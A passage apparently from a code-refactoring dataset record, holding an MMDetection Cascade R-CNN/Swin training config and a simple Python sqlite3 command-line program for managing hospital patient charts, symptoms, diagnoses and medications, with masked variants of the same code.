"step-2": "_base_ = ['../models/cascade_rcnn_r50_fpn.py', '../datasets/dataset.py',\n '../runtime/valid_search_wandb_runtime.py', '../schedules/schedule_1x.py']\npretrained = (\n 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth'\n )\nmodel = dict(type='CascadeRCNN', backbone=dict(_delete_=True, type=\n 'SwinTransformer', embed_dims=96, depths=[2, 2, 6, 2], num_heads=[3, 6,\n 12, 24], window_size=7, mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.2, patch_norm=True,\n out_indices=(0, 1, 2, 3), with_cp=False, convert_weights=True, init_cfg\n =dict(type='Pretrained', checkpoint=pretrained)), neck=dict(in_channels\n =[96, 192, 384, 768]))\nimg_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, \n 57.375], to_rgb=True)\ntrain_pipeline = [dict(type='LoadImageFromFile'), dict(type=\n 'LoadAnnotations', with_bbox=True), dict(type='RandomFlip', flip_ratio=\n 0.5), dict(type='AutoAugment', policies=[[dict(type='Resize', img_scale\n =[(480, 1024), (512, 1024), (544, 1024), (576, 1024), (608, 1024), (640,\n 1024), (672, 1024), (704, 1024), (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value', keep_ratio=True)], [dict(type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)], multiscale_mode=\n 'value', keep_ratio=True), dict(type='RandomCrop', crop_type=\n 'absolute_range', crop_size=(384, 600), allow_negative_crop=True), dict\n (type='Resize', img_scale=[(480, 1024), (512, 1024), (544, 1024), (576,\n 1024), (608, 1024), (640, 1024), (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)], multiscale_mode='value', override=True,\n keep_ratio=True)]]), dict(type='Normalize', **img_norm_cfg), dict(type=\n 'Pad', size_divisor=32), dict(type='DefaultFormatBundle'), dict(type=\n 'Collect', keys=['img', 'gt_bboxes', 'gt_labels'])]\nval_pipeline = [dict(type='LoadImageFromFile'), dict(type='LoadAnnotations',\n with_bbox=True), dict(type='RandomFlip', flip_ratio=0.5), dict(type=\n 'AutoAugment', policies=[[dict(type='Resize', img_scale=[(480, 1024), (\n 512, 1024), (544, 1024), (576, 1024), (608, 1024), (640, 1024), (672, \n 1024), (704, 1024), (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value', keep_ratio=True)], [dict(type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)], multiscale_mode=\n 'value', keep_ratio=True), dict(type='RandomCrop', crop_type=\n 'absolute_range', crop_size=(384, 600), allow_negative_crop=True), dict\n (type='Resize', img_scale=[(480, 1024), (512, 1024), (544, 1024), (576,\n 1024), (608, 1024), (640, 1024), (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)], multiscale_mode='value', override=True,\n keep_ratio=True)]]), dict(type='Normalize', **img_norm_cfg), dict(type=\n 'Pad', size_divisor=32), dict(type='DefaultFormatBundle'), dict(type=\n 'Collect', keys=['img', 'gt_bboxes', 'gt_labels'])]\ndata = dict(train=dict(pipeline=train_pipeline), val=dict(pipeline=\n val_pipeline))\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\ncheckpoint_config = dict(interval=1)\nlog_config = dict(interval=50, hooks=[dict(type='TextLoggerHook')])\ncustom_hooks = [dict(type='NumClassCheckHook')]\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\noptimizer = dict(_delete_=True, type='AdamW', lr=0.0001, betas=(0.9, 0.999),\n weight_decay=0.05, paramwise_cfg=dict(custom_keys={'absolute_pos_embed':\n dict(decay_mult=0.0), 'relative_position_bias_table': dict(decay_mult=\n 0.0), 'norm': dict(decay_mult=0.0)}))\nlr_config = dict(warmup_iters=1000, step=[27, 33])\nrunner = dict(max_epochs=36)\n",
"step-3": "_base_ = [\n '../models/cascade_rcnn_r50_fpn.py',\n #'coco_instance.py',\n '../datasets/dataset.py',\n '../runtime/valid_search_wandb_runtime.py',\n '../schedules/schedule_1x.py'\n]\npretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' # noqa\nmodel = dict(\n type='CascadeRCNN',\n backbone=dict(\n _delete_=True,\n type='SwinTransformer',\n embed_dims=96,\n depths=[2, 2, 6, 2],\n num_heads=[3, 6, 12, 24],\n window_size=7,\n mlp_ratio=4,\n qkv_bias=True,\n qk_scale=None,\n drop_rate=0.,\n attn_drop_rate=0.,\n drop_path_rate=0.2,\n patch_norm=True,\n out_indices=(0, 1, 2, 3),\n with_cp=False,\n convert_weights=True,\n init_cfg=dict(type='Pretrained', checkpoint=pretrained)),\n neck=dict(in_channels=[96, 192, 384, 768])\n #[256, 512, 1024, 2048]\n)\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\n# augmentation strategy originates from DETR / Sparse RCNN\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='AutoAugment',\n policies=[[\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),\n (608, 1024), (640, 1024), (672, 1024), (704, 1024),\n (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value',\n keep_ratio=True)\n ],\n [\n dict(\n type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)],\n multiscale_mode='value',\n keep_ratio=True),\n dict(\n type='RandomCrop',\n crop_type='absolute_range',\n crop_size=(384, 600),\n allow_negative_crop=True),\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024),\n (576, 1024), (608, 1024), (640, 1024),\n (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)],\n multiscale_mode='value',\n override=True,\n keep_ratio=True)\n ]]),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\nval_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='AutoAugment',\n policies=[[\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),\n (608, 1024), (640, 1024), (672, 1024), (704, 1024),\n (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value',\n keep_ratio=True)\n ],\n [\n dict(\n type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)],\n multiscale_mode='value',\n keep_ratio=True),\n dict(\n type='RandomCrop',\n crop_type='absolute_range',\n crop_size=(384, 600),\n allow_negative_crop=True),\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024),\n (576, 1024), (608, 1024), (640, 1024),\n (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)],\n multiscale_mode='value',\n override=True,\n keep_ratio=True)\n ]]),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ndata = dict(train=dict(pipeline=train_pipeline),val=dict(pipeline=val_pipeline))\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\n\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(\n # type='WandbLoggerHook',\n # init_kwargs=dict(\n # project='valid_search',\n # name='YOUR_EXP'\n # ))\n ])\n# yapf:enable\ncustom_hooks = [dict(type='NumClassCheckHook')]\n\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\noptimizer = dict(\n _delete_=True,\n type='AdamW',\n lr=0.0001,\n betas=(0.9, 0.999),\n weight_decay=0.05,\n paramwise_cfg=dict(\n custom_keys={\n 'absolute_pos_embed': dict(decay_mult=0.),\n 'relative_position_bias_table': dict(decay_mult=0.),\n 'norm': dict(decay_mult=0.)\n }))\nlr_config = dict(warmup_iters=1000, step=[27, 33])\nrunner = dict(max_epochs=36)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sqlite3
import os
#Search for a patient name
#Every doctor enter a name, it will find the patinet name that is similar to the patient name
#Once a match is found, the system will output a list of matched patient names.
#Then, the doctor select the patient to continue
def patientSelect(CONN, staff):
c = CONN.cursor()
print("Search for Patient")
select = input("Enter patient name(type 'exit' to leave): ")
if select == 'exit':
os.system('clear')
#return doctorMenu(CONN, staff[0])
return
c.execute('''SELECT hcno, name FROM patients WHERE name LIKE ?''', ('%'+select+'%',))
rows = c.fetchall()
if len(rows) == 0:
print("No patient found, please try again")
return patientSelect(CONN, staff)
count = 1
for x in rows:
print(str(count)+": patient hcno "+x[0]+"; patient name: "+x[1])
count = count + 1
try:
select = input("Please select your patient: ")
selectedPatient = int(select)-1
patientHCNO = rows[selectedPatient][0]
patientName = rows[selectedPatient][1]
patient = (patientHCNO, patientName)
except:
print("Invalid input, please try again")
return patientSelect(CONN, staff)
return patientChart(CONN, staff, patient)
#Output the tables related to the patient
#The doctor can select an open chart to continue
def patientChart(CONN, staff, patient):
c = CONN.cursor()
os.system('clear')
print("Patient HCNO: " + patient[0] + ", Patient Name: " + patient[1])
c.execute('''SELECT *
FROM charts
WHERE hcno = ?
ORDER BY adate
''', (patient[0],))
rows = c.fetchall()
count = 1
checkOpenChart = 0
for x in rows:
print(str(count)+": chart id: "+x[0]+"; patient hcno: "+ x[1] + "; admission time: "+x[2], end="")
if x[3] is None:
print(" discharge time: " + "Status: open.")
checkOpenChart = checkOpenChart + 1
else:
print(" discharge time: " + x[3] + "Status: close.")
count = count + 1;
if checkOpenChart == 0:
print("No open chart")
openChart = input("Do you want to create a new chart (y/n):")
if openChart == 'y':
print("Open chart")
return addChart(CONN, staff, patient)
else:
print("")
print("You have an open chart. If you want a new chart, close the open chart first")
try:
select = input("Please select a chart to continue(type 'exit' to leave): ")
if select == 'exit':
os.system('clear')
return patientSelect(CONN, staff)
selectChart = int(select)-1
chart_id = rows[selectChart][0]
except:
print("Invalid enry")
return patientChart(CONN, staff, patient)
if rows[selectChart][3] is None:
editAble = 1
else:
editAble = 0
return viewChart(CONN, chart_id, staff, patient, editAble)
#View a list of charts that related to the patient
def viewChart(CONN, chart_id, staff, patient, editAble):
c = CONN.cursor()
os.system('clear')
print("Patient HCNO: " + patient[0] + ", Patient Name: " + patient[1])
print("symptoms table")
c.execute('''SELECT *
FROM symptoms
WHERE hcno = ? AND chart_id = ?
ORDER BY obs_date;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
print("diagnosis table")
c.execute('''SELECT *
FROM diagnoses
WHERE hcno = ? AND chart_id = ?
ORDER BY ddate;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
print("medication table")
c.execute('''SELECT *
FROM medications
WHERE hcno = ? AND chart_id = ?
ORDER BY mdate;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
if editAble == 0:
input("Press any key to return: ")
return patientChart(CONN, staff, patient)
if staff[1] == 'D':
return doctorChartMenu(CONN, patient, chart_id, staff)
elif staff[1] == 'N':
return nurseChartMenu(CONN, patient, chart_id, staff)
#If the chart is open, able to edit the chart
def doctorChartMenu(CONN, patient, chart_id, staff):
print("==========Chart Menu==========")
print("1. Add a symptoms")
print("2. Add a Diagnosis")
print("3. Add a medication")
print("4. Exit")
select = input("Please select an option to continue: ")
if select == '1':
print("Add symptoms")
os.system('clear')
return addSymptoms(CONN, patient, chart_id, staff)
elif select == '2':
print("Add Diagnosis")
os.system('clear')
return addDiagnosis(CONN, patient, chart_id, staff)
elif select == '3':
print("Add medication")
os.system('clear')
return addMedication(CONN, patient, chart_id, staff)
elif select == '4':
return patientChart(CONN, staff, patient)
else:
print("Invalid entry, please try again")
return patientSelect(CONN, staff)
def nurseChartMenu(CONN, patient, chart_id, staff):
print("Chart Menu")
print("1. Add a symptoms")
print("2. close chart")
print("3. Exit")
select = input("Please select an option to cintinue: ")
if select == '1':
os.system('clear')
return addSymptoms(CONN, patient, chart_id, staff)
elif select == '2':
print("xx")
return closeChart(CONN, patient, chart_id, staff)
elif select == '3':
return patientChart(CONN, staff, patient)
else:
print("Invalid, please try again")
return patientSelect(CONN, staff)
#Insert a symptom
#Ask doctor for symptom name
#Observer date will be current time
# The function will return to viewChart()
def addSymptoms(CONN, patient, chart_id, staff):
c = CONN.cursor()
symptoms = input("Please enter a symptom: ")
while len(symptoms) == 0:
symptoms = input("Please enter a symptom: ")
c.execute('''INSERT INTO symptoms VALUES
(?,?,?,DateTime('now','localtime'),?);''',(patient[0], chart_id, staff[0], symptoms))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
# Insert a diagnosis
# Will prompt for a diagnose name
# Observe date will be current time
# Return to viewChart() after finish
def addDiagnosis(CONN, patient, chart_id, staff):
#Insert a diagnosis
c = CONN.cursor()
diagnosis = input("Please enter a diagnosis: ")
while len(diagnosis) == 0:
diagnosis = input("Please enter a diagnosis: ")
c.execute('''INSERT INTO diagnoses VALUES
(?,?,?,DateTime('now', 'localtime'),?);''',(patient[0], chart_id, staff[0], diagnosis))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
# Insert a medication
# Will prompt for a medication name
# start date will be today
# Return to viewChart() after finish
def addMedication(CONN, patient, chart_id, staff):
c = CONN.cursor()
c.execute("SELECT * FROM patients WHERE hcno = ?;",(patient[0],))
rows = c.fetchone()
patientAge = rows[2]
#Get Medication Name, if not exist in database, return to previous page
medicationName = input("Please enter a medication: ")
c.execute("SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;", (medicationName,patientAge))
dosageAmount = c.fetchone()
if dosageAmount == None:
print("Drug Name not exist")
input("Press any key to return")
return viewChart(CONN, chart_id, staff, patient, 1)
c.execute('''SELECT drug_name FROM reportedallergies WHERE hcno = ?;''', (patient[0],))
allergies = c.fetchone()
for x in allergies:
if x == medicationName:
print("WARNING, the patinet is allergic to "+ x)
c.execute('''SELECT canbe_alg FROM inferredallergies WHERE alg = ?;''',(medicationName,))
inferallergies = c.fetchall()
for x in inferallergies:
print("Patinet can be allergic to: " + x[0])
# Get prescripbtion amount, if larger than suggest amount, display warning message
amount = int(input("Medication amount: "))
if amount > dosageAmount[0]:
print("Suggest Amount: "+ str(dosageAmount[0]))
confirm = input("WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)")
if confirm == 'n':
return viewChart(CONN, chart_id, staff, patient, 1)
#Get medication period
day = input("Medication length(in days): ")
c.execute('''INSERT INTO medications VALUES
(?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);''',(patient[0], chart_id, staff[0], '+'+day+' day', amount, medicationName))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
def closeChart(CONN, patient, chart_id, staff):
c = CONN.cursor()
c.execute("SELECT * FROM charts WHERE chart_id = ?;", (chart_id,))
rows = c.fetchone()
if rows[3] is None:
print("Close chart id "+str(chart_id)+"?")
print("1. Yes.")
print("2. No.")
result = input("Please enter your choice: ")
if result == '1':
print("Closing chart.")
c.execute('''UPDATE charts SET edate = DateTime('now','localtime')
WHERE chart_id = ?;''', (chart_id,))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
elif result == '2':
return viewChart(CONN, chart_id, staff, patient, 1)
else:
print("Invalid")
return closeChart(CONN, patient, chart_id, staff)
def addPatient(CONN, staff):
c = CONN.cursor()
print("==========New Patient Record==========")
name = input("Please enter patient name: ")
hcno = input("Please enter patient HCNO: ")
try:
testHcno = int(hcno)
except:
print("Invalid HCNO, please try again")
return addPatient(CONN, staff)
age_group = input("Please enter age group: ")
address = input("Please enter address: ")
phone = input("Please enter phone number: ")
emg_phone = input("Please enter emergency phone number: ")
try:
c.execute('''INSERT INTO patients VALUES
(?,?,?,?,?,?);''',(hcno, name, age_group, address, phone, emg_phone))
CONN.commit()
print("Patient record created.")
except:
print("Invalid entry, patient already exists")
def addChart(CONN, staff, patient):
c = CONN.cursor()
#phcno = input("Please enter patient health care #: ")
c.execute("SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;")
last_chart = c.fetchone()
if last_chart[0] is not None:
new_chart_id = int(last_chart[0])+1
else:
new_chart_id = '00001'
c.execute('''INSERT INTO charts VALUES
(?,?, DateTime('now','localtime'), ?);''', (new_chart_id, patient[0], None))
c.execute("SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;", (patient[0],))
CONN.commit()
print("A new chart had been create. Chart ID: "+ str(new_chart_id))
return patientChart(CONN, staff, patient)
|
normal
|
{
"blob_id": "b3b4d27b60c71cbd979ad4887fa80408665ea1ac",
"index": 2853,
"step-1": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n<mask token>\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\n<mask token>\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-2": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n<mask token>\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-3": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n c.execute(\n \"\"\"SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n \"\"\"\n , (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count) + ': chart id: ' + x[0] + '; patient hcno: ' + x[1\n ] + '; admission time: ' + x[2], end='')\n if x[3] is None:\n print(' discharge time: ' + 'Status: open.')\n checkOpenChart = checkOpenChart + 1\n else:\n print(' discharge time: ' + x[3] + 'Status: close.')\n count = count + 1\n if checkOpenChart == 0:\n print('No open chart')\n openChart = input('Do you want to create a new chart (y/n):')\n if openChart == 'y':\n print('Open chart')\n return addChart(CONN, staff, patient)\n else:\n print('')\n print(\n 'You have an open chart. If you want a new chart, close the open chart first'\n )\n try:\n select = input(\n \"Please select a chart to continue(type 